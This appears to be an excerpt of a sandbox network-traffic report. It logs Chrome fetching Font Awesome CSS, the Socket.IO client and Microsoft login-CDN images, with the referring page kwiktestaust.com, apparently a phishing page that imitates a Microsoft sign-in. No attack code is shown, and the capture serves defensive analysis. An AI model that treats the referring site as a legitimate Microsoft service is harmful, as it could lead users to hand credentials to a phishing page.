                                                                2024-11-07 20:40:05 UTC419INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 2a 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 46 72 65 65 20 36 2e 31 2e 31 20 62 79 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 0a 20 2a 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 63 6f 6d 2f 6c 69 63 65 6e 73 65 2f 66 72 65 65 20 28 49 63 6f 6e 73 3a 20 43 43 20 42 59 20 34 2e 30 2c 20 46 6f 6e 74 73 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 6f 64 65 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 32 32 20 46 6f 6e 74 69 63 6f 6e 73 2c 20 49 6e 63 2e 0a 20 2a 2f 0a 2e 66 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 66 61 2d 73 74 79 6c 65
                                                                Data Ascii: 7bfa/*! * Font Awesome Free 6.1.1 by @fontawesome - https://fontawesome.com * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) * Copyright 2022 Fonticons, Inc. */.fa{font-family:var(--fa-style
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 64 69 73 70 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 64 69 73 70 6c 61 79 2c 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 29 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 76 61 72 69 61 6e 74 3a 6e 6f 72 6d 61 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 74 65 78 74 2d 72 65 6e 64 65 72 69 6e 67 3a 61 75 74 6f 7d 2e 66 61 2d 31 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 2e 66 61 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 33 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 65 6d 7d 2e 66 61 2d 34 78 7b 66 6f 6e 74 2d 73 69 7a
                                                                Data Ascii: z-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-siz
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 2d 2d 66 61 2d 70 75 6c 6c 2d 6d 61 72 67 69 6e 2c 2e 33 65 6d 29 7d 2e 66 61 2d 62 65 61 74 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 62 65 61 74 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 2c 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f
                                                                Data Ascii: --fa-pull-margin,.3em)}.fa-beat{-webkit-animation-name:fa-beat;animation-name:fa-beat;-webkit-animation-delay:var(--fa-animation-delay,0);animation-delay:var(--fa-animation-delay,0);-webkit-animation-direction:var(--fa-animation-direction,normal);animatio
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 32 38 2c 2e 38 34 2c 2e 34 32 2c 31 29 29 7d 2e 66 61 2d 66 61 64 65 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 66 61 2d 66 61 64 65 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e
                                                                Data Ascii: -fa-animation-timing,cubic-bezier(.28,.84,.42,1))}.fa-fade{-webkit-animation-name:fa-fade;animation-name:fa-fade;-webkit-animation-iteration-count:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,in
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 69 72 65 63 74 69 6f 6e 2c 6e 6f 72 6d 61 6c 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 2c 31 73 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e
                                                                Data Ascii: on-direction,normal);animation-direction:var(--fa-animation-direction,normal);-webkit-animation-duration:var(--fa-animation-duration,1s);animation-duration:var(--fa-animation-duration,1s);-webkit-animation-iteration-count:var(--fa-animation-iteration-coun
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 2c 69 6e 66 69 6e 69 74 65 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 3b 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 76 61 72 28 2d 2d 66 61 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2c 6c 69 6e 65 61 72 29 7d 2e 66 61 2d 73 70
                                                                Data Ascii: ount:var(--fa-animation-iteration-count,infinite);animation-iteration-count:var(--fa-animation-iteration-count,infinite);-webkit-animation-timing-function:var(--fa-animation-timing,linear);animation-timing-function:var(--fa-animation-timing,linear)}.fa-sp
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 7b 30 25 2c 39 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 34 35 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 73 63 61 6c 65 2c 31 2e 32 35 29 29 7d 7d 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 6f 75 6e 63 65 7b 30 25 7b 2d 77 65
                                                                Data Ascii: 25));transform:scale(var(--fa-beat-scale,1.25))}}@keyframes fa-beat{0%,90%{-webkit-transform:scale(1);transform:scale(1)}45%{-webkit-transform:scale(var(--fa-beat-scale,1.25));transform:scale(var(--fa-beat-scale,1.25))}}@-webkit-keyframes fa-bounce{0%{-we
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 31 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 78 2c 31 2e 31 29 2c 76 61 72 28 2d 2d 66 61 2d 62 6f 75 6e 63 65 2d 73 74 61 72 74 2d 73 63 61 6c 65 2d 79 2c 2e 39 29 29 20 74 72 61 6e 73 6c 61 74 65 59 28 30 29 7d 33 30 25 7b
                                                                Data Ascii: eY(0);transform:scale(1) translateY(0)}10%{-webkit-transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0);transform:scale(var(--fa-bounce-start-scale-x,1.1),var(--fa-bounce-start-scale-y,.9)) translateY(0)}30%{
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29
                                                                Data Ascii: t-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125)
                                                                2024-11-07 20:40:05 UTC1369INData Raw: 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 38 64 65 67 29 7d 31 32 25 2c 32 38 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 64 65 67 29 7d 31 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66
                                                                Data Ascii: ransform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,24%{-webkit-transform:rotate(-18deg);transform:rotate(-18deg)}12%,28%{-webkit-transform:rotate(18deg);transform:rotate(18deg)}16%{-webkit-transf


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.164972213.227.219.404436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:05 UTC359OUTGET /4.7.5/socket.io.min.js HTTP/1.1
                                                                Host: cdn.socket.io
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC702INHTTP/1.1 200 OK
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Content-Length: 49993
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=31536000, immutable
                                                                Content-Disposition: inline; filename="socket.io.min.js"
                                                                Date: Sat, 10 Aug 2024 13:19:28 GMT
                                                                ETag: "777eb8fd4f8320b6e5cc9a7159bdec6a"
                                                                Server: Vercel
                                                                Strict-Transport-Security: max-age=63072000
                                                                X-Vercel-Cache: HIT
                                                                X-Vercel-Id: fra1::wp9nt-1723295968503-82751798f325
                                                                X-Cache: Hit from cloudfront
                                                                Via: 1.1 4cc2a0a7eb7d5483edc69be298297f9e.cloudfront.net (CloudFront)
                                                                X-Amz-Cf-Pop: AMS54-C1
                                                                X-Amz-Cf-Id: hmhtCFGRDzT7DsMW8Xs6dyfOR5qhW_wVRtr0fHdnjZcoAf9LbzrPPQ==
                                                                Age: 7716038
                                                                2024-11-07 20:40:06 UTC15682INData Raw: 2f 2a 21 0a 20 2a 20 53 6f 63 6b 65 74 2e 49 4f 20 76 34 2e 37 2e 35 0a 20 2a 20 28 63 29 20 32 30 31 34 2d 32 30 32 34 20 47 75 69 6c 6c 65 72 6d 6f 20 52 61 75 63 68 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 74 29 3a 28 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67
                                                                Data Ascii: /*! * Socket.IO v4.7.5 * (c) 2014-2024 Guillermo Rauch * Released under the MIT License. */!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof g
                                                                2024-11-07 20:40:06 UTC16384INData Raw: 64 20 74 68 69 73 2e 73 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 6f 6e 45 72 72 6f 72 28 65 29 7d 29 2c 30 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 26 26 28 74 68 69 73 2e 69 6e 64 65 78 3d 69 2e 72 65 71 75 65 73 74 73 43 6f 75 6e 74 2b 2b 2c 69 2e 72 65 71 75 65 73 74 73 5b 74 68 69 73 2e 69 6e 64 65 78 5d 3d 74 68 69 73 29 7d 7d 2c 7b 6b 65 79 3a 22 6f 6e 45 72 72 6f 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 65 72 72 6f 72 22 2c 65 2c 74 68 69 73 2e 78 68 72 29 2c 74 68 69 73 2e 63 6c 65 61 6e 75 70 28 21 30 29 7d 7d 2c 7b 6b 65 79 3a 22 63 6c 65 61 6e 75 70 22 2c 76 61 6c 75 65 3a 66 75 6e
                                                                Data Ascii: d this.setTimeoutFn((function(){t.onError(e)}),0)}"undefined"!=typeof document&&(this.index=i.requestsCount++,i.requests[this.index]=this)}},{key:"onError",value:function(e){this.emitReserved("error",e,this.xhr),this.cleanup(!0)}},{key:"cleanup",value:fun
                                                                2024-11-07 20:40:06 UTC16384INData Raw: 65 2e 64 61 74 61 2c 69 64 3a 65 2e 69 64 7d 29 7d 7d 2c 7b 6b 65 79 3a 22 65 6e 63 6f 64 65 41 73 53 74 72 69 6e 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 22 2b 65 2e 74 79 70 65 3b 72 65 74 75 72 6e 20 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 45 56 45 4e 54 26 26 65 2e 74 79 70 65 21 3d 3d 42 65 2e 42 49 4e 41 52 59 5f 41 43 4b 7c 7c 28 74 2b 3d 65 2e 61 74 74 61 63 68 6d 65 6e 74 73 2b 22 2d 22 29 2c 65 2e 6e 73 70 26 26 22 2f 22 21 3d 3d 65 2e 6e 73 70 26 26 28 74 2b 3d 65 2e 6e 73 70 2b 22 2c 22 29 2c 6e 75 6c 6c 21 3d 65 2e 69 64 26 26 28 74 2b 3d 65 2e 69 64 29 2c 6e 75 6c 6c 21 3d 65 2e 64 61 74 61 26 26 28 74 2b 3d 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 2e 64 61 74 61 2c 74 68 69
                                                                Data Ascii: e.data,id:e.id})}},{key:"encodeAsString",value:function(e){var t=""+e.type;return e.type!==Be.BINARY_EVENT&&e.type!==Be.BINARY_ACK||(t+=e.attachments+"-"),e.nsp&&"/"!==e.nsp&&(t+=e.nsp+","),null!=e.id&&(t+=e.id),null!=e.data&&(t+=JSON.stringify(e.data,thi
                                                                2024-11-07 20:40:06 UTC1543INData Raw: 65 74 54 69 6d 65 6f 75 74 46 6e 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 28 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 61 74 74 65 6d 70 74 22 2c 74 2e 62 61 63 6b 6f 66 66 2e 61 74 74 65 6d 70 74 73 29 2c 74 2e 73 6b 69 70 52 65 63 6f 6e 6e 65 63 74 7c 7c 74 2e 6f 70 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3f 28 74 2e 5f 72 65 63 6f 6e 6e 65 63 74 69 6e 67 3d 21 31 2c 74 2e 72 65 63 6f 6e 6e 65 63 74 28 29 2c 65 2e 65 6d 69 74 52 65 73 65 72 76 65 64 28 22 72 65 63 6f 6e 6e 65 63 74 5f 65 72 72 6f 72 22 2c 6e 29 29 3a 74 2e 6f 6e 72 65 63 6f 6e 6e 65 63 74 28 29 7d 29 29 29 7d 29 2c 6e 29 3b 74 68 69 73 2e 6f 70 74 73 2e 61 75 74 6f 55 6e 72 65 66 26 26 72 2e
                                                                Data Ascii: etTimeoutFn((function(){t.skipReconnect||(e.emitReserved("reconnect_attempt",t.backoff.attempts),t.skipReconnect||t.open((function(n){n?(t._reconnecting=!1,t.reconnect(),e.emitReserved("reconnect_error",n)):t.onreconnect()})))}),n);this.opts.autoUnref&&r.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.164972613.107.246.454436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:05 UTC652OUTGET /shared/1.0/content/images/arrow_left_a9cc2824ef3517b6c4160dcf8ff7d410.svg HTTP/1.1
                                                                Host: logincdn.msauth.net
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC799INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:06 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 276
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 22 Jan 2020 00:38:00 GMT
                                                                ETag: 0x8D79ED35591CF44
                                                                x-ms-request-id: 63e5acef-701e-002c-699f-2e2ff9000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204005Z-16547b76f7fcjqqhhC1DFWrrrc00000008pg000000008f5f
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache-Info: L1_T2
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
                                                                2024-11-07 20:40:06 UTC276INData Raw: 1f 8b 08 00 00 00 00 00 04 00 95 51 3d 6f c3 20 10 fd 2b 88 ae e6 e0 08 d8 b8 b2 3d 74 ca 90 ae 1d ba 45 8a 6b 5b 22 1f aa 91 c9 cf 2f 67 3b 6e 87 2c 15 f0 80 bb 7b ef 9e a0 1a a7 8e dd cf fe 32 d6 bc 0f e1 f6 2a 65 8c 11 e2 0e ae df 9d d4 4a 29 99 2a 38 8b c3 29 f4 35 d7 86 b3 be 1d ba 3e 2c e7 69 68 e3 db f5 5e 73 c5 14 d3 26 4d de 54 61 08 be 6d 8e e3 d8 86 b1 92 cb ad ba 1d 43 cf 4e 35 7f 47 97 21 82 2d dc 04 ce 98 7d 01 39 16 7e 07 a5 c6 8c d0 09 b0 a5 a1 75 c8 33 d4 de 40 69 8c 98 71 4b cc 9c 55 e5 93 b3 af c1 fb 9a bf 18 45 83 cb bf bd 14 f1 b2 02 94 cd fd 53 fa 1e ff ef e3 ac 04 a0 41 01 aa c0 b4 0e 36 95 97 a4 47 9b 05 67 1d 11 d6 2c 66 33 67 c1 35 46 1b b1 49 9d da d8 47 40 3c 0e 98 4c 2e 3a 60 b5 4e 26 01 3f 52 03 93 0c cf 89 64 b4 b0 28 08 37
                                                                Data Ascii: Q=o +=tEk["/g;n,{2*eJ)*8)5>,ih^s&MTamCN5G!-}9~u3@iqKUESA6Gg,f3g5FIG@<L.:`N&?Rd(7


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.164972913.107.246.444436880C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-11-07 20:40:05 UTC674OUTGET /shared/1.0/content/images/picker_verify_fluent_authenticator_59892f1e05e3adf9fd2f71b42d92a27f.svg HTTP/1.1
                                                                Host: aadcdn.msauth.net
                                                                Connection: keep-alive
                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                sec-ch-ua-mobile: ?0
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                sec-ch-ua-platform: "Windows"
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Referer: https://kwiktestaust.com/
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-11-07 20:40:06 UTC800INHTTP/1.1 200 OK
                                                                Date: Thu, 07 Nov 2024 20:40:05 GMT
                                                                Content-Type: image/svg+xml
                                                                Content-Length: 2407
                                                                Connection: close
                                                                Cache-Control: public, max-age=31536000
                                                                Content-Encoding: gzip
                                                                Last-Modified: Wed, 24 May 2023 10:11:49 GMT
                                                                ETag: 0x8DB5C3F499A9B99
                                                                x-ms-request-id: 8f34a892-a01e-0010-2ca4-2c063e000000
                                                                x-ms-version: 2009-09-19
                                                                x-ms-lease-status: unlocked
                                                                x-ms-blob-type: BlockBlob
                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                Access-Control-Allow-Origin: *
                                                                x-azure-ref: 20241107T204005Z-16547b76f7fxsvjdhC1DFWprrs00000008pg0000000009bk
                                                                x-fd-int-roxy-purgeid: 0
                                                                X-Cache-Info: L1_T2
                                                                X-Cache: TCP_HIT
                                                                Accept-Ranges: bytes
